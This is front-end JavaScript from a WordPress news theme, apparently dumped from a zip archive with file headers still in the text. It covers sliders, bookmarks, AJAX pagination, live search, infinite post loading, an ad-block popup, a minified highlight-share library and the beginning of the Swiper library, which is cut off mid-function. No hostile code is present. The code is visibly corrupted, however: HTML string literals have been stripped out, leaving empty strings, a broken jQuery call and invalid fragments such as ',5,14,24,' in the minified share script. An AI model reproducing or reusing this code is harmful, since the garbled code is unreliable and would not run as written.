params.autoplay = { delay: self.themeSettings.sliderSpeed, pauseOnMouseEnter: true, stopOnLastSlide: true, disableOnInteraction: true, } if (slider.data('speed')) { params.autoplay.delay = slider.data('speed'); } } params.pagination = { el: slider.find('.slider-pagination')[0], clickable: true, }; params.navigation = { nextEl: slider.find('.slider-next')[0], prevEl: slider.find('.slider-prev')[0] } new RBSwiper(this, params); }); } /** carousel blocks */ Module.carousels = function () { var self = this; var carousels = $('.post-carousel'); if (carousels.length < 1) { return false; } carousels.each(function () { var carousel = $(this); var params = { grabCursor: true, allowTouchMove: true, freeMode: false, loop: true } params.slidesPerView = carousel.data('mcol'); params.spaceBetween = carousel.data('mgap'); params.centeredSlides = carousel.data('centered'); params.navigation = { nextEl: carousel.find('.slider-next')[0], prevEl: carousel.find('.slider-prev')[0] } if (carousel.find('.slider-pagination')[0]) { params.pagination = { el: carousel.find('.slider-pagination')[0], type: 'bullets', clickable: true, }; } if (carousel.data('play')) { params.autoplay = { delay: self.themeSettings.sliderSpeed, pauseOnMouseEnter: true, stopOnLastSlide: true, disableOnInteraction: true, } if (carousel.data('speed')) { params.autoplay.delay = carousel.data('speed'); } } if (carousel.data('fmode')) { params.freeMode = true; } params.breakpoints = { 768: { slidesPerView: carousel.data('tcol'), spaceBetween: carousel.data('tgap') }, 1025: { slidesPerView: carousel.data('col'), spaceBetween: carousel.data('gap') }, 1500: { slidesPerView: carousel.data('wcol'), spaceBetween: carousel.data('gap') } }; params.on = { afterInit: function (swiper) { var wrap = $(swiper.$wrapperEl); $(swiper.$wrapperEl).find('.p-box').css('height', wrap.height()); }, resize: function (swiper) { var wrap = $(swiper.$wrapperEl); $(swiper.$wrapperEl).find('.p-box').css('height', wrap.height()); }, }; new RBSwiper(this, params); }); } /* ================================ SINGLE GALLERY ================================ */ Module.singleGallery = function () { var self = this; var gallerySections = self.body.find('.featured-gallery-wrap'); if (!gallerySections.length) { return; } gallerySections.each(function () { var section = $(this); if (!section.hasClass('is-loaded')) { var index = section.data('gallery'); var sliderEl = section.find('.gallery-slider').attr('id'); var sliderNavEl = section.find('.gallery-slider-nav').attr('id'); var carouselEl = section.find('.gallery-carousel').attr('id'); var coverflowEL = section.find('.gallery-coverflow').attr('id'); if ('undefined' != typeof sliderEl && 'undefined' != typeof sliderNavEl) { var galleryNav = new RBSwiper('#' + sliderNavEl, { spaceBetween: 15, slidesPerView: 6, freeMode: self.themeSettings.sliderFMode, grabCursor: true, loop: true, watchSlidesVisibility: true, watchSlidesProgress: true, on: { init: function () { $(this.$wrapperEl).removeClass('pre-load'); }, }, }); var gallerySlider = new RBSwiper('#' + sliderEl, { spaceBetween: 0, grabCursor: true, loop: true, pagination: { el: '.swiper-pagination-' + index, type: 'progressbar', clickable: true, }, on: { init: function () { section.addClass('is-loaded'); }, }, thumbs: { swiper: galleryNav } }); gallerySlider.on('slideChange', function () { if (this.activeIndex) { $(this.$el).next().find('.current-slider-count').fadeOut(0).html(this.activeIndex).fadeIn(250); } }); } if ('undefined' != typeof carouselEl) { new RBSwiper('#' + carouselEl, { spaceBetween: 20, slidesPerView: 'auto', freeMode: self.themeSettings.sliderFMode, loop: false, grabCursor: true, scrollbar: { el: '.swiper-scrollbar-' + index, hide: true, }, on: { init: function () { $(this.$wrapperEl).removeClass('pre-load'); section.addClass('is-loaded'); }, }, }); } if ('undefined' != typeof coverflowEL) { new RBSwiper('#' + coverflowEL, { effect: "coverflow", grabCursor: true, centeredSlides: true, slidesPerView: 1.2, coverflowEffect: { rotate: 50, stretch: 0, depth: 250, modifier: 1, slideShadows: true, }, breakpoints: { 768: { slidesPerView: 3 } }, on: { init: function () { $(this.$wrapperEl).removeClass('pre-load'); section.addClass('is-loaded'); }, }, pagination: { el: '.swiper-pagination-' + index, clickable: true, }, }); } } }); } Module.highlightShares = function () { var self = this; if (!self.themeSettings.highlightShares || (window.matchMedia && window.matchMedia('(pointer: coarse)').matches)) { return; } var extra = []; var config = { selectableElements: ['.is-highlight-shares'], twitterUsername: self.themeSettings.twitterName, }; if (self.themeSettings.highlightShareFacebook) { config.facebook = true; } if (self.themeSettings.highlightShareTwitter) { config.twitter = true; } if (self.themeSettings.highlightShareReddit) { extra.push({ icon: '', url: 'https://reddit.com/submit?url=PAGE_URL&title=TEXT_SELECTION' }); } Sharect.config(config).appendCustomShareButtons(extra).init(); } /** * * @returns {boolean} */ Module.floatingVideo = function () { var self = this; var floating = $('.floating-video').not('.is-loaded'); if (floating.length < 1 || window.outerWidth < 1025) { return false; } self.wPoint['Floating'] = new Waypoint({ element: floating, offset: -floating.height(), handler: function (direction) { self.body.find('.floating-video').addClass('is-loaded').removeClass('floating-activated'); self.body.find('.floatingcolorose').remove(); if ('down' == direction) { this.element.addClass(' floating-activated'); this.element.find('.float-holder').prepend(''); } } }); } Module.floatingVideoRemove = function () { var self = this; self.body.on('click', '.floatingcolorose', function (e) { e.preventDefault(); e.stopPropagation(); self.body.find('.floating-video').removeClass('floating-activated'); self.wPoint['Floating'].destroy(); }) } /* ================================ BOOKMARKS ================================ */ Module.syncBookmark = function () { var self = this; if (self.body.hasClass('sync-bookmarks')) { $.ajax({ type: 'POST', url: self.themeSettings.ajaxurl, data: { action: 'sync_bookmarks' }, success: function (response) { response = JSON.parse(JSON.stringify(response)); $.each(response, function (index, val) { $('.bookmark-trigger[data-pid=' + val + ']').css('opacity', 0).addClass('bookmarked').animate({opacity: 1}, 250); }); } }); } } Module.bookmarkToggle = function () { var self = this; $('.bookmark-trigger').off('click').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var target = $(this); var pid = target.data('pid'); var infoTemplate = $('#bookmark-toggle-info'); if (!pid || self.bookmarkProgressing) { return false; } self.bookmarkProgressing = true; target.addClass('in-progress'); clearTimeout(self.timeOut); $.ajax({ type: 'POST', url: self.themeSettings.ajaxurl, data: { action: 'rb_bookmark', pid: pid }, success: function (response) { response = JSON.parse(JSON.stringify(response)); if ('added' === response.action) { $('.bookmark-trigger[data-pid=' + pid + ']').css('opacity', 0).addClass('bookmarked').animate({opacity: 1}, 250); infoTemplate.addClass('added'); infoTemplate.removeClass('removed'); } else { $('.bookmark-trigger[data-pid=' + pid + ']').css('opacity', 0).removeClass('bookmarked').animate({opacity: 1}, 250); infoTemplate.removeClass('added'); infoTemplate.addClass('removed'); } if (infoTemplate.length) { infoTemplate.fadeOut(100, function () { infoTemplate.find('.bookmark-featured').html(response.image); infoTemplate.find('.bookmark-title').html(response.title); infoTemplate.find('.bookmark-desc').html(response.description); infoTemplate.fadeIn(300); self.timeOut = setTimeout(function () { infoTemplate.fadeOut(600); }, 2000); }); infoTemplate.on({ mouseenter: function () { clearTimeout(self.timeOut); }, mouseleave: function () { self.timeOut = setTimeout(function () { infoTemplate.fadeOut(600); }, 1200); } }); } target.removeClass('in-progress'); self.bookmarkProgressing = false; } }); }); }; /** remove bookmark */ Module.removeBookmark = function () { var self = this; $('.remove-bookmark').off('click').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var target = $(this); var pid = target.data('pid'); var wrapper = target.parents('.p-wrap'); var infoTemplate = $('#bookmark-remove-info'); if (!pid || self.bookmarkProgressing) { return false; } self.bookmarkProgressing = true; wrapper.fadeOut(600, function () { wrapper.addClass('removing'); infoTemplate.fadeIn(300); }); self.removeBookmarkTimeout = setTimeout(function () { infoTemplate.fadeOut(600); wrapper.trigger('removeBookmark', pid); }, 2000); $('#bookmark-undo').on('click', function () { self.bookmarkProgressing = false; wrapper.fadeIn(1000); infoTemplate.fadeOut(600); return false; }); infoTemplate.on({ mouseenter: function () { clearTimeout(self.removeBookmarkTimeout); }, mouseleave: function () { self.removeBookmarkTimeout = setTimeout(function () { infoTemplate.fadeOut(600); wrapper.trigger('removeBookmark', pid); }, 1200); } }); wrapper.on('removeBookmark', function (event, pid) { if (self.bookmarkProgressing) { $.ajax({ type: 'POST', url: self.themeSettings.ajaxurl, data: { action: 'rb_bookmark', pid: pid }, success: function (response) { wrapper.remove(); self.bookmarkProgressing = false; } }); } }); }) }; Module.followToggle = function () { var self = this; $('.follow-trigger').off('click').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var target = $(this); var cid = target.data('cid'); if (!cid || self.followProgressing) { return false; } self.followProgressing = true; target.addClass('in-progress'); $.ajax({ type: 'POST', url: self.themeSettings.ajaxurl, data: { action: 'rb_follow', cid: cid }, success: function (response) { response = JSON.parse(JSON.stringify(response)); if ('added' === response.action) { $('.follow-trigger[data-cid=' + cid + ']').css('opacity', 0).addClass('followed').animate({opacity: 1}, 250); } else { $('.follow-trigger[data-cid=' + cid + ']').css('opacity', 0).removeClass('followed').animate({opacity: 1}, 250); } target.removeClass('in-progress'); self.followProgressing = false; } }); }); }; Module.siteAccessDetector = function () { var self = this; var wrap = $('#rb-site-access'); if (wrap.length < 1) { return false; } if (typeof blockAdBlock === 'undefined') { self.siteAccessPopup(); } else { blockAdBlock.onDetected(self.siteAccessPopup); } }; Module.siteAccessPopup = function () { $.magnificPopup.open({ type: 'inline', preloader: false, closeBtnInside: false, removalDelay: 500, showCloseBtn: false, closeOnBgClick: false, items: { src: '#rb-site-access', type: 'inline' }, mainClass: 'popup-animation site-access-popup', fixedBgPos: true, fixedContentPos: true, }); }; /* ================================ AJAX PAGINATION ================================ */ Module.paginationNextPrev = function () { var self = this; $('.pagination-trigger').off('click').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var paginationTrigger = $(this); if (paginationTrigger.hasClass('is-disable')) { return; } var block = paginationTrigger.parents('.block-wrap'); var uuid = block.attr('id'); if (!self.ajaxData[uuid]) { self.ajaxData[uuid] = self.getBlockSettings(uuid); } if (self.ajaxData[uuid] && self.ajaxData[uuid].processing) { return; } self.ajaxData[uuid].processing = true; var type = paginationTrigger.data('type'); self.ajaxStartAnimation(block, 'replace'); self.ajaxReplaceLoad(block, uuid, type); }); }; Module.ajaxReplaceLoad = function (block, uuid, type) { var self = this; if (!self.ajaxData[uuid].paged) { self.ajaxData[uuid].paged = 1; } if ('prev' === type) { self.ajaxData[uuid].page_next = parseInt(self.ajaxData[uuid].paged) - 1; } else { self.ajaxData[uuid].page_next = parseInt(self.ajaxData[uuid].paged) + 1; } var cacheID = self.cacheData.getCacheID(uuid, self.ajaxData[uuid].page_next); /** use cache */ if (self.cacheData.exist(cacheID)) { var cache = self.cacheData.get(cacheID); if ('undefined' != typeof cache.paged) { self.ajaxData[uuid].paged = cache.paged; } setTimeout(function () { self.ajaxRenderHTML(block, uuid, cache, 'replace'); }, 250) } else { /** POST AJAX */ $.ajax({ type: 'GET', url: self.themeSettings.ajaxurl, data: { action: 'live_pagination', data: self.ajaxData[uuid] }, success: function (response) { response = JSON.parse(JSON.stringify(response)); if ('undefined' !== typeof response.paged) { self.ajaxData[uuid].paged = response.paged; } self.cacheData.set(cacheID, response); self.ajaxRenderHTML(block, uuid, response, 'replace'); } }); } }; Module.paginationLoadMore = function () { var self = this; $('.loadmore-trigger').off('click').on('click', function (e) { e.preventDefault(); e.stopPropagation(); var paginationTrigger = $(this); if (paginationTrigger.hasClass('is-disable')) { return; } var block = paginationTrigger.parents('.block-wrap'); var uuid = block.attr('id'); if (!self.ajaxData[uuid]) { self.ajaxData[uuid] = self.getBlockSettings(uuid); } if (self.ajaxData[uuid] && self.ajaxData[uuid].processing) { return; } self.ajaxData[uuid].processing = true; self.ajaxStartAnimation(block, 'append'); self.ajaxAppendLoad(block, uuid); }) }; Module.paginationInfinite = function () { var self = this; var infiniteElements = $('.pagination-infinite'); if (infiniteElements.length > 0) { infiniteElements.each(function () { var paginationTrigger = $(this); if (!paginationTrigger.hasClass('is-disable')) { var block = paginationTrigger.parents('.block-wrap'); var uuid = block.attr('id'); var wPointID = 'infinite' + uuid; if (!self.ajaxData[uuid]) { self.ajaxData[uuid] = self.getBlockSettings(uuid); } var params = { element: paginationTrigger, offset: 'bottom-in-view', handler: function (direction) { if (self.ajaxData[uuid] && self.ajaxData[uuid].processing) { return; } if ('down' == direction) { self.ajaxData[uuid].processing = true; self.ajaxStartAnimation(block, 'append'); self.ajaxAppendLoad(block, uuid); } } } if ('uid_notification' == uuid) { params.context = block.parents('.scroll-holder').eq(0); if (window.outerWidth < 1025) { return; } } self.wPoint[wPointID] = new Waypoint(params); } }); } }; Module.ajaxAppendLoad = function (block, uuid) { var self = this; if (!self.ajaxData[uuid].paged) { self.ajaxData[uuid].paged = 1; } if (self.ajaxData[uuid].paged > self.ajaxData[uuid].page_max) { return; } self.ajaxData[uuid].page_next = parseInt(self.ajaxData[uuid].paged) + 1; $.ajax({ type: 'GET', url: self.themeSettings.ajaxurl, data: { action: 'live_pagination', data: self.ajaxData[uuid] }, success: function (response) { response = JSON.parse(JSON.stringify(response)); if ('undefined' !== typeof response.paged) { self.ajaxData[uuid].paged = response.paged; } if ('undefined' != response.notice) { response.content = response.content + response.notice; } self.ajaxRenderHTML(block, uuid, response, 'append'); } }); }; /** live search */ Module.liveSearch = function () { var liveSearch = $('.live-search-form'); if (liveSearch.length == 0) { return; } var self = this; liveSearch.each(function () { var liveSearchEl = $(this); var input = liveSearchEl.find('input[type="text"]'); var responseWrap = liveSearchEl.find('.live-search-response'); var animation = liveSearchEl.find('.live-search-animation'); input.attr('autocomplete', 'off'); var delay = (function () { var timer = 0; return function (callback, ms) { clearTimeout(timer); timer = setTimeout(callback, ms); }; })(); input.keyup(function () { var param = $(this).val(); delay(function () { if (param) { liveSearchEl.addClass('search-loading'); setTimeout(function () { animation.fadeIn(200); }, 250); $.ajax({ type: 'GET', url: self.themeSettings.ajaxurl, data: { action: 'live_search', s: param }, success: function (data) { data = $.parseJSON(JSON.stringify(data)); animation.fadeOut(200); setTimeout(function () { liveSearchEl.removeClass('search-loading'); }, 250); responseWrap.hide().empty().css('height', responseWrap.height()); responseWrap.html(data); responseWrap.css('height', 'auto').fadeIn(250); } }); } else { responseWrap.fadeOut(250, function () { responseWrap.empty().css('height', 'auto'); }); } }, 250); }) }); }; /** register cache object */ Module.cacheData = { data: {}, get: function (id) { return this.data[id]; }, set: function (id, data) { this.remove(id); this.data[id] = data; }, remove: function (id) { delete this.data[id]; }, getCacheID: function (blockID, currentPage) { return JSON.stringify('RB_' + blockID + '_' + currentPage); }, exist: function (id) { return this.data.hasOwnProperty(id) && this.data[id] !== null; } }; /** * ajax start animation * @param block * @param action */ Module.ajaxStartAnimation = function (block, action) { var inner = block.find('.block-inner'); block.find('.pagination-trigger').addClass('is-disable'); inner.stop(); if ('replace' === action) { inner.css('min-height', inner.outerHeight()); inner.fadeTo('250', 0.05); inner.after(''); } else { block.find('.loadmore-trigger').addClass('loading'); block.find('.rb-loader').css({'display': 'block'}).delay(250).animate({opacity: 1}, 250); } }; /** * render ajax * @param block * @param uuid * @param response * @param action */ Module.ajaxRenderHTML = function (block, uuid, response, action) { var self = this; block.delay(50).queue(function () { var uuid = block.attr('id'); var inner = block.find('.block-inner'); block.find('.pagination-trigger').removeClass('is-disable'); inner.stop(); if ('replace' === action) { inner.html(response.content); block.find('.rb-loader').animate({opacity: 0}, 250, function () { $(this).remove(); }) inner.css('min-height', ''); inner.fadeTo(250, 1); } else { var content = $(response.content); inner.append(content); content.addClass('is-invisible'); content.addClass('opacity-animate'); block.find('.rb-loader').animate({opacity: 0}, 250, function () { $(this).css({'display': 'none'}); }); setTimeout(function () { content.removeClass('is-invisible'); }, 250); block.find('.loadmore-trigger').removeClass('loading'); } /** reload */ self.ajaxTriggerState(block, uuid); self.ajaxData[uuid].processing = false; if (inner.hasClass('is-masonry')) { $(inner).isotope('reloadItems'); } block.dequeue(); self.reinitiateFunctions(); Waypoint.refreshAll(); }); } /** * set * @param block * @param uuid */ Module.ajaxTriggerState = function (block, uuid) { var self = this; block.find('.pagination-trigger').removeClass('is-disable'); if (self.ajaxData[uuid].paged < 2) { block.find('[data-type="prev"]').addClass('is-disable'); } else if (self.ajaxData[uuid].paged >= self.ajaxData[uuid].page_max) { block.find('[data-type="next"]').addClass('is-disable'); block.find('.loadmore-trigger').addClass('is-disable').hide(); block.find('.pagination-infinite').addClass('is-disable').hide(); } } /** * get block settings * @param uuid * @returns {string|*} */ Module.getBlockSettings = function (uuid) { var settings; if ('undefined' !== typeof window[uuid]) { settings = window[uuid]; } return this.cleanNull(settings); } /** * remove empty values * @param data * @returns {string|*} */ Module.cleanNull = function (data) { if ('string' == typeof data) { return data; } $.each(data, function (key, value) { if (value === '' || value === null) { delete data[key]; } }); return data; } /* ================================ SINGLE INFINITE ================================ */ Module.singleInfiniteLoadNext = function () { var infiniteWrapper = $('#single-post-infinite'); if (!infiniteWrapper.length) { return; } var self = this; var infiniteLoadPoint = $('#single-infinite-point'); var animationIcon = infiniteLoadPoint.find('.rb-loader'); var loadNexParam = { element: infiniteLoadPoint, offset: 'bottom-in-view', handler: function (direction) { if (true === self.ajaxData['singleProcessing'] || 'up' == direction) { return; } var nextPostURL = infiniteWrapper.data('nextposturl'); if (nextPostURL.indexOf('?') != -1 || nextPostURL.indexOf('#') != -1) { nextPostURL = nextPostURL + '&rbsnp=1'; } else { nextPostURL = nextPostURL + '?rbsnp=1'; } self.ajaxData['singleProcessing'] = true; animationIcon.css({'display': 'block'}).animate({opacity: 1}, 250); $.ajax({ type: 'GET', url: nextPostURL, dataType: 'html', success: function (response) { response = $.parseJSON(JSON.stringify(response)); response = $('
    ').append($.parseHTML(response)); response = response.find('.single-post-outer'); var nextPostURL = response.data('nextposturl'); if ('undefined' != typeof (nextPostURL) && nextPostURL.length > 0) { infiniteWrapper.data('nextposturl', nextPostURL); } else { infiniteWrapper.removeAttr('id'); infiniteLoadPoint.remove(); } animationIcon.animate({opacity: 0}, 250).delay(250).css({'display': 'none'}); infiniteWrapper.append(response); self.ajaxData['singleProcessing'] = false; setTimeout(function () { Waypoint.refreshAll(); self.reinitiateFunctions(); if ('undefined' != typeof FOXIZ_CORE_SCRIPT) { FOXIZ_CORE_SCRIPT.loadGoogleAds(response); FOXIZ_CORE_SCRIPT.loadInstagram(response); } }, 1); } }); } } self.wPoint['ajaxSingleNextPosts'] = new Waypoint(loadNexParam); }; Module.singleScrollRefresh = function () { var infiniteWrapper = $('#single-post-infinite'); if (!infiniteWrapper.length) { return; } var self = this; self.articleData = []; var articleOuter = infiniteWrapper.find('.single-post-outer'); if (articleOuter.length > 0) { self.inviewPostID = articleOuter.eq(0).data('postid'); articleOuter.each(function () { var article = $(this); var itemData = { postID: article.data('postid'), postURL: article.data('postlink'), postTitle: article.find('h1[itemprop="headline"]').text(), shareList: article.find('.sticky-share-list-buffer').html(), top: article.offset().top, bottom: article.offset().top + article.outerHeight(true) }; if (self.readIndicator.length > 0) { var content = article.find('div[itemprop="articleBody"]'); content = content.eq(0); itemData.indicatorTop = content.offset().top; itemData.indicatorHeight = content.outerHeight(true) - self.window.height(); } self.articleData.push(itemData); }); if (window.addEventListener) { window.addEventListener('scroll', function () { self.animationFrame(self.scrollToUpdateArticle.bind(self)); }, false); } } }; /** scrollToUpdateArticle */ Module.scrollToUpdateArticle = function () { var self = this; var scroll = self.window.scrollTop(); self.articleData.every(function (article) { if (scroll > (article.top + 5) && scroll < (article.bottom - 5)) { if (article.indicatorTop) { self.readIndicatorPercent = ((scroll - article.indicatorTop) / article.indicatorHeight) * 100; if (self.readIndicatorPercent <= 130) { self.readIndicator.css('width', self.readIndicatorPercent + '%'); } } if (article.postID != self.inviewPostID) { self.inviewPostID = article.postID; if (article.postURL !== '') { history.replaceState(null, null, article.postURL); } document.title = article.postTitle; $('#s-title-sticky .sticky-title').hide().html(article.postTitle).fadeIn(300); $('#s-title-sticky .sticky-share-list').html(article.shareList); self.body.find('.floating-video').removeClass('floating-activated'); if ('undefined' != typeof FOXIZ_CORE_SCRIPT) { FOXIZ_CORE_SCRIPT.updateGA(article); } } return false; } return true; }); }; /** productQuantity */ Module.productQuantity = function () { this.document.on('click', '.quantity .quantity-btn', function (e) { e.preventDefault(); var button = $(this); var step = 1; var input = button.parent().find('input'); var min = 1; var max = 9999; var value_old = parseInt(input.val()); var value_new = parseInt(input.val()); if (input.attr('step')) { step = parseInt(input.attr('step')); } if (input.attr('min')) { min = parseInt(input.attr('min')); } if (input.attr('max')) { max = parseInt(input.attr('max')); } if (button.hasClass('up')) { if (value_old < max) { value_new = value_old + step; } else { value_new = 1; } } else if (button.hasClass('down')) { if (value_old > min) { value_new = value_old - step; } else { value_new = 0; } } if (!input.attr('disabled')) { input.val(value_new).change(); } }); }; return Module; }(FOXIZ_MAIN_SCRIPTS || {}, jQuery) ) /** init */ jQuery(document).ready(function ($) { FOXIZ_MAIN_SCRIPTS.init(); }); /** Elementor editor */ jQuery(window).on('elementor/frontend/init', function () { if (window.elementor && window.elementorFrontend) { elementorFrontend.hooks.addAction('frontend/element_ready/widget', FOXIZ_MAIN_SCRIPTS.initElementor); } });PK!n''assets/js/highlight-share.jsnu[!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Sharect=t():e.Sharect=t()}(window,function(){return function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}return r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="",r(r.s=0)}([function(e,t,r){"use strict";function n(){return!!window.getSelection().toString()}function o(e){var t=(window.getSelection().baseNode||window.getSelection().anchorNode).parentNode;return e.some(function(e){return function(e,t){if(Element.prototype.closest)return e.closest(t);Element.prototype.matches||(Element.prototype.matches=Element.prototype.matchesSelector||Element.prototype.mozMatchesSelector||Element.prototype.msMatchesSelector||Element.prototype.oMatchesSelector||Element.prototype.webkitMatchesSelector);var r=e;do{if(r.matches(t))return r;r=r.parentNode}while(null!==r&&r.nodeType===Node.ELEMENT_NODE);return null}(t,e)})}function i(e){var t=e.iconSize,r=e.buttonMargin,n=e.arrowSize,o=e.icons,i=window.getSelection().getRangeAt(0).getBoundingClientRect(),c=t+r,u=window.pageXOffset||document.documentElement.scrollTop||document.body.scrollTop;return{top:i.top+u-c-n,left:i.left+(i.width-c*o.length)/2}}r.r(t);var c=function(e){return""},u=function(e,t){return"position:absolute;border-radius:3px;top:"+e+"px;left:"+t+"px;"},l=function(e){var t=e.arrowSize;return"position:absolute;border-left:"+t+"px solid transparent;border-right:"+t+"px solid transparent;bottom:-"+(t-1)+"px;width:0;height:0;"};function a(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),r.push.apply(r,n)}return r}function s(e,t,r){return t in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}function f(e){var t=i(e),r=function(e){for(var t=1;t'},twitter:{isActive:!0,username:"",url:"https://twitter.com/intent/tweet?text=TEXT_SELECTION&via=USERNAME&url=PAGE_URL",icon:''}},y={},h=["body"],w=[],g="#ffffff",O="#333333",5,14,24,{config:function(e){return void 0!==e.twitter&&(m.twitter.isActive=e.twitter),void 0!==e.facebook&&(m.facebook.isActive=e.facebook),e.twitterUsername&&(m.twitter.username=e.twitterUsername),e.backgroundColor&&(g=e.backgroundColor),e.iconColor&&(O=e.iconColor),e.selectableElements&&(h=e.selectableElements),this},appendCustomShareButtons:function(e){return w=e,this},init:function(){var e={backgroundColor:g,iconColor:O,arrowSize:5,buttonMargin:14,iconSize:24,selectableElements:h,networks:m,customShareButtons:w};return function(e){e.iconColor,document.createElement("style")}(x({},e)),y=function(e){var t=e.networks,r=e.customShareButtons,n=document.createElement("div"),o=0;for(var i in t)if(t[i]&&t[i].isActive){var c=t[i],u=c.icon,l=c.url,a=c.username;n.appendChild(S(u,l,a)),o++}return r.length>0&&r.forEach(function(e){n.appendChild(S(e.icon,e.url)),o++}),{icons:n,length:o}}(x({},e)),function(e){window.addEventListener("mouseup",function(){return function(e){setTimeout(function(){if(document.querySelector(".highlight-shares")){if(n()&&o(e.selectableElements))return void function(e){var t=i(e),r=t.top,n=t.left,o=document.querySelector(".highlight-shares");o.style.top="".concat(r,"px"),o.style.left="".concat(n,"px")}(b({},e));document.body.removeChild(document.querySelector(".highlight-shares"))}n()&&o(e.selectableElements)&&f(b({},e))},10)}(e)},!1)}(x({},e,{icons:y})),this}})}]).default});PK!;D+D+assets/js/rbswiper.min.jsnu[/** * Swiper 6.5.8 * Most modern mobile touch slider and framework with hardware accelerated transitions * https://swiperjs.com * * Copyright 2014-2021 Vladimir Kharlampidi * * Released under the MIT License * * Released on: April 23, 2021 */ !function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).RBSwiper=t()}(this,(function(){"use strict";function e(e,t){for(var a=0;a0&&i(e[s],t[s])}))}var s={body:{},addEventListener:function(){},removeEventListener:function(){},activeElement:{blur:function(){},nodeName:""},querySelector:function(){return null},querySelectorAll:function(){return[]},getElementById:function(){return null},createEvent:function(){return{initEvent:function(){}}},createElement:function(){return{children:[],childNodes:[],style:{},setAttribute:function(){},getElementsByTagName:function(){return[]}}},createElementNS:function(){return{}},importNode:function(){return null},location:{hash:"",host:"",hostname:"",href:"",origin:"",pathname:"",protocol:"",search:""}};function r(){var e="undefined"!=typeof document?document:{};return i(e,s),e}var n={document:s,navigator:{userAgent:""},location:{hash:"",host:"",hostname:"",href:"",origin:"",pathname:"",protocol:"",search:""},history:{replaceState:function(){},pushState:function(){},go:function(){},back:function(){}},CustomEvent:function(){return this},addEventListener:function(){},removeEventListener:function(){},getComputedStyle:function(){return{getPropertyValue:function(){return""}}},Image:function(){},Date:function(){},screen:{},setTimeout:function(){},clearTimeout:function(){},matchMedia:function(){return{}},requestAnimationFrame:function(e){return"undefined"==typeof setTimeout?(e(),null):setTimeout(e,0)},cancelAnimationFrame:function(e){"undefined"!=typeof setTimeout&&clearTimeout(e)}};function o(){var e="undefined"!=typeof window?window:{};return i(e,n),e}function l(e){return(l=Object.setPrototypeOf?Object.getPrototypeOf:function(e){return e.__proto__||Object.getPrototypeOf(e)})(e)}function d(e,t){return(d=Object.setPrototypeOf||function(e,t){return e.__proto__=t,e})(e,t)}function p(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Date.prototype.toString.call(Reflect.construct(Date,[],(function(){}))),!0}catch(e){return!1}}function c(e,t,a){return(c=p()?Reflect.construct:function(e,t,a){var i=[null];i.push.apply(i,t);var s=new(Function.bind.apply(e,i));return a&&d(s,a.prototype),s}).apply(null,arguments)}function u(e){var t="function"==typeof Map?new Map:void 0;return(u=function(e){if(null===e||(a=e,-1===Function.toString.call(a).indexOf("[native code]")))return e;var a;if("function"!=typeof e)throw new TypeError("Super expression must either be null or a function");if(void 0!==t){if(t.has(e))return t.get(e);t.set(e,i)}function i(){return c(e,arguments,l(this).constructor)}return i.prototype=Object.create(e.prototype,{constructor:{value:i,enumerable:!1,writable:!0,configurable:!0}}),d(i,e)})(e)}var h=function(e){var t,a;function i(t){var a,i,s;return a=e.call.apply(e,[this].concat(t))||this,i=function(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}(a),s=i.__proto__,Object.defineProperty(i,"__proto__",{get:function(){return s},set:function(e){s.__proto__=e}}),a}return a=e,(t=i).prototype=Object.create(a.prototype),t.prototype.constructor=t,t.__proto__=a,i}(u(Array));function v(e){void 0===e&&(e=[]);var t=[];return e.forEach((function(e){Array.isArray(e)?t.push.apply(t,v(e)):t.push(e)})),t}function f(e,t){return Array.prototype.filter.call(e,t)}function m(e,t){var a=o(),i=r(),s=[];if(!t&&e instanceof h)return e;if(!e)return new h(s);if("string"==typeof e){var n=e.trim();if(n.indexOf("<")>=0&&n.indexOf(">")>=0){var l="div";0===n.indexOf("0})).length>0},toggleClass:function(){for(var e=arguments.length,t=new Array(e),a=0;a=0;h-=1){var v=u[h];r&&v.listener===r||r&&v.listener&&v.listener.dom7proxy&&v.listener.dom7proxy===r?(c.removeEventListener(d,v.proxyListener,n),u.splice(h,1)):r||(c.removeEventListener(d,v.proxyListener,n),u.splice(h,1))}}return this},trigger:function(){for(var e=o(),t=arguments.length,a=new Array(t),i=0;i0})),p.dispatchEvent(c),p.dom7EventData=[],delete p.dom7EventData}}return this},transitionEnd:function(e){var t=this;return e&&t.on("transitionend",(function a(i){i.target===this&&(e.call(this,i),t.off("transitionend",a))})),this},outerWidth:function(e){if(this.length>0){if(e){var t=this.styles();return this[0].offsetWidth+parseFloat(t.getPropertyValue("margin-right"))+parseFloat(t.getPropertyValue("margin-left"))}return this[0].offsetWidth}return null},outerHeight:function(e){if(this.length>0){if(e){var t=this.styles();return this[0].offsetHeight+parseFloat(t.getPropertyValue("margin-top"))+parseFloat(t.getPropertyValue("margin-bottom"))}return this[0].offsetHeight}return null},styles:function(){var e=o();return 